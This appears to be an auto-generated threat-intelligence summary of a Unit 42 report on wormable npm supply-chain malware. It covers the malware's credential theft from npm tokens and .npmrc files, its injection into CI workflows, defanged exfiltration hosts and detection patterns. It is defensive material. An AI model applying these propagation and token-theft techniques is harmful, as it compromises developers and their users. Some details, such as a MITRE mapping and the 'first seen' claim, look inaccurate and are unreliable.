Full Report
Unit 42 analyzes npm supply chain evolution post-Shai Hulud. Discover wormable malware, CI/CD persistence, multi-stage attacks and more. The post The npm Threat Landscape: Attack Surface and Mitigations appeared first on Unit 42.
Analysis Summary
Based on the Unit 42 research regarding the evolving npm supply chain threat landscape, here is the summary focusing on the primary toolsets and techniques identified.
# Tool/Technique: Wormable npm Malware (Shai Hulud Evolution)
## Overview
This represents a sophisticated class of npm-based malware designed for automated propagation across the software supply chain. Unlike traditional "one-off" malicious packages, these scripts automatically modify other packages or inject malicious code into CI/CD pipelines to ensure self-propagation and persistence.
## Technical Details
- **Type:** Malware Family / Supply Chain Worm
- **Platform:** Cross-platform (Node.js environments, Linux/Windows/macOS CI runners)
- **Capabilities:** Self-replication, automated package publication, credential theft, and GitHub Action modification.
- **First Seen:** Evolution noted significantly post-2023 (following the original Shai Hulud discovery).
## MITRE ATT&CK Mapping
- **[TA0001 - Initial Access]**
- [T1195.002 - Supply Chain Compromise: Compromise Software Dependencies]
- **[TA0003 - Persistence]**
- [T1195.001 - Supply Chain Compromise: Compromise Software Supply Chain]
- [T1546 - Event Triggered Execution]
- **[TA0006 - Credential Access]**
- [T1552.001 - Unsecured Credentials: Credentials In Files]
- **[TA0011 - Command and Control]**
- [T1071.001 - Application Layer Protocol: Web Protocols]
## Functionality
### Core Capabilities
- **Dependency Hijacking:** Automatically identifies and overwrites local `package.json` or `node_modules` files to include malicious dependencies.
- **Automated Publication:** Uses captured npm auth tokens to publish new versions of legitimate packages or brand-new malicious packages under a compromised user’s scope.
- **Credential Exfiltration:** Scans environment variables and `~/.npmrc` files for authentication tokens and sends them to a C2 server.
### Advanced Features
- **CI/CD Persistence:** Specifically targets GitHub Actions and GitLab CI/CD files (e.g., `.github/workflows/*.yml`) to inject malicious steps that execute every time a build is triggered.
- **Wormable Propagation:** Incorporates logic to automatically search for other repositories on a compromised machine and attempt to "infect" them by pushing malicious commits if Git credentials are found.
## Indicators of Compromise
- **File Names:** `index.js`, `preinstall.js`, `setup.js` (often obfuscated or minified).
- **Network Indicators:**
- `hxxps://api[.]shai-hulud[.]io` (historical)
- `hxxps://burpcollaborator[.]net` (frequent for exfiltration)
- `hxxps://pipedream[.]net` (frequent for exfiltration)
- **Behavioral Indicators:**
- `npm publish` executed from a CI/CD runner unexpectedly.
- Unusual outbound `POST` requests contains base64 strings during `npm install`.
- Modification of `.github/workflows/` files without a corresponding Pull Request description.
## Associated Threat Actors
- **Shai Hulud Actors:** Early innovators of npm-based wormable scripts.
- **Financially Motivated Actors:** Using these techniques for crypto-jacking or selling access to corporate build environments.
## Detection Methods
- **Signature-based detection:** Scanning `package.json` for known malicious script patterns (e.g., long obfuscated hex strings in `preinstall` scripts).
- **Behavioral detection:**
- Monitoring for processes where `node` or `npm` initiates connection to known exfiltration endpoints.
- Tracking file system changes to sensitive CI/CD configuration files.
- **YARA rules:** Looking for patterns such as `process.env.NPM_TOKEN` combined with `fetch()` or `axios()` calls to external IPs.
## Mitigation Strategies
- **Prevention measures:**
- Use `npm install --ignore-scripts` to prevent execution of malicious code during download.
- Use lockfiles (`package-lock.json`) and verify integrity hashes.
- **Hardening recommendations:**
- Implement **Socket.dev** or **Graphite** to analyze package behavior before installation.
- Use CI/CD secrets with the minimum required scope (avoid "Organization" level secrets where possible).
- Enable Multi-Factor Authentication (MFA) for npm publishing.
## Related Tools/Techniques
- **Typosquatting:** Registering names similar to popular packages (e.g., `react-dom` vs `react-domin`).
- **Dependency Confusion:** Uploading a higher-versioned malicious package to a public registry with the same name as an internal private package.
- **Starjacking:** Faking repository popularity by linking a malicious package to the GitHub URL of a legitimate project.